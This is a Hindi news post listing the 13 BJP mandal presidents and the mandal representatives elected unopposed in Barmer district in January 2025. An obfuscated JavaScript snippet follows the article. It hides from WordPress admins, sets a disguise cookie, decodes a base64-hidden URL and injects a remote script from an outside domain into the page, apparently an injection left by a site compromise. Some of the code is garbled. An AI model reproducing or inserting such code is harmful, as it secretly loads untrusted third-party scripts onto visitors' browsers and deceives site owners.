बाड़मेर जिला भाजपा के मंडल अध्यक्षों व प्रतिनिधि के चुनाव संपन्न

इन दिनों भारतीय जनता पार्टी में संगठनात्मक चुनाव चल रहे हैं जिसमें पार्टी के छोटे स्तर के संगठनात्मक चुनाव सबसे पहले हुए हैं जिसके तहत मंडल अध्यक्षों को चुना गया है। बाद में जिला स्तर, राज्य स्तर और फिर राष्ट्रीय अध्यक्ष की नियुक्ति की जानी है। बाड़मेर जिले के जिला चुनाव प्रभारी व राज्य सरकार के मंत्री रामगोपाल सुथार ने 6 जनवरी 2025 को बाड़मेर जिले के अपने सभी 13 मंडलो के मंडल अध्यक्षों का चुनाव संपन्न करवाया गया गौरतलब है कि ये सभी 13 मंडल अध्यक्ष निर्विरोध निर्वाचित हुए हैं। भाजपा जिला मंत्री ललित बोथरा ने मीडिया से बातचीत में बताया कि जिला चुनाव प्रभारी रामगोपाल सुथार ने सभी ने सभी मंडलों के प्रमुख कार्यकर्ताओं व पदाधिकारियों से विचार विमर्श करने के बाद गठन की प्रक्रिया को अंतिम रूप दिया गया। नवनिर्वाचित मंडल अध्यक्षों की विस्तृत सूची इस प्रकार है –

क्रम संख्यामंडल का नाममंडल अध्यक्ष का नाम
1बायतू मंडल हनुमान राम जाणी
2बाटाडू मंडल मगराज सहूं
3पंडित दीनदयाल उपाध्याय मंडलसवाई सिंह भाटी
4गिड़ा मंडल देवाराम मूंड
5पाटौदी मंडल पुखराज प्रजापत
6बाड़मेर गादान मंडलस्वरुप सिंह लंगेरा
7बाड़मेर ग्रामीण मंडल दमाराम लेघा
8चवा मंडल नरपत सिंह
9अंबेडकर मंडल ओमप्रकाश भील
10जसनाथ मंडलकैलाश बेनिवाल
11धनाऊ मंडललूणाराम मेघवाल
12साता मंडलबांकाराम देवासी
13भाडखा मंडल प्रेम कुमार कुमावत

साथ ही मंडल प्रतिनिधि के रूप में बायतु से गणेश शर्मा, बाटाडू से दामोदर लेघा , पंडित दीनदयाल उपाध्याय मंडल से मूलाराम बैरड, गिड़ा से चुतराराम सुथार, अंबेडकर मंडल से भारथा राम , जसनाथ मंडल से मदन लाल सोनी, पाटोदी मंडल से गेनाराम प्रजापत, बाड़मेर गादान से मांगीलाल जैन , बाड़मेर ग्रामीण से रुखाराम, धनाऊ से धर्म सिंह राजपुरोहित, साता से नैनाराम प्रजापतभाडखा मंडल से नेनाराम को सदस्य निर्वाचित किया गया है।

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply